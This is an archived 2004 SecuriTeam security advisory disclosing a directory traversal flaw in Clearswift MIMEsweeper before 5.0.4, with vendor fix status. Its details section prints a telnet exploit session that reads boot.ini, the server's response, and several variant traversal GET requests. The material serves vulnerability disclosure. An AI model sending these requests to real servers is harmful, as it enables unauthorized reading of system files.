[NEWS] Clearswift MIMEsweeper Directory Traversal Vulnerability

From: SecuriTeam (support_at_securiteam.com)
Date: 08/15/04

  • Next message: SecuriTeam: "[UNIX] QuiXplorer Directory Traversal" 
    To: list@securiteam.com
Date: 15 Aug 2004 15:27:58 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Clearswift MIMEsweeper Directory Traversal Vulnerability
    ------------------------------------------------------------------------

    SUMMARY

     <http://www.mimesweeper.com/products/msw/default.asp> MIMEsweeper is "a
    family of products designed to implement email and web communications
    e-policies. MIMEsweeper delivers the capabilities for organizations to
    protect themselves against email and web based threats, meet legal and
    regulatory requirements, implement productivity saving policies and manage
    the intellectual property passing through their network".

    A vulnerability in the product allows attackers to retrieve files that
    would otherwise be inaccessible through a directory traversal
    vulnerability.

    DETAILS

    Vulnerable Systems:
     * Clearswift MIMEsweeper versions prior to 5.0.4

    Immune Systems:
     * Clearswift MIMEsweeper version 5.0.4 or newer

    It is possible to read arbitrary files on the remote server by pre-pending
    /foobar/\../\../ in front on the file name.

    Example:
    telnet xx.xx.xx.xx 80
    Trying xx.xx.xx.xx...
    Connected to xx.xx.xx.xx.
    Escape character is '^]'.
    GET /foobar/..\\..\\..\\..\\..\\..\\boot.ini HTTP/1.0

    HTTP/1.0 200 Ok
    Date: Do, 27 Jul 2004 14:30:07 GMT
    Server: Clearswift Web Server
    Content-length: 186
    Content-type: application/octet-stream

    [boot loader]
    timeout=30
    default=multi(0)disk(0)rdisk(0)partition(1)\WINNT
    [operating systems]
    multi(0)disk(0)rdisk(0)partition(1)\WINNT="Microsoft Windows 2000 Server"
    /fastdetect
    Connection closed by foreign host.

    Here are some several examples:
    GET /foobar/..\\..\\..\\..\\boot.ini HTTP/1.0
    GET /foobar/..\..\..\..\..\..\\boot.ini HTTP/1.0
    GET /foobar/..\..\..\..\..\..\boot.ini HTTP/1.0
    GET /foobar/\..\..\..\..\..\boot.ini HTTP/1.0
    GET /foobar//..\\..\\..\\..\\boot.ini HTTP/1.0
    GET /foobar//..\\..//..\\..//boot.ini HTTP/1.0
    GET /foobar/\../\../\../\../\boot.ini HTTP/1.0
    GET /foobar/../../../../boot.ini HTTP/1.0
    GET /foobar\..\..\..\..\boot.ini HTTP/1.0

    Impact:
    This vulnerability can be used to retrieve any file from the portion where
    the Clearswift web server is installed. The number of "/","\",".."
    characters will depend on the ServerRoot (location of the virtual /
    directory) setting.

    Vendor Status:
    Clearswift has fixed the vulnerability in version 5.0.4 or newer.

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:kroma@syss.de> Pierre Kroma.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[UNIX] QuiXplorer Directory Traversal"

    Relevant Pages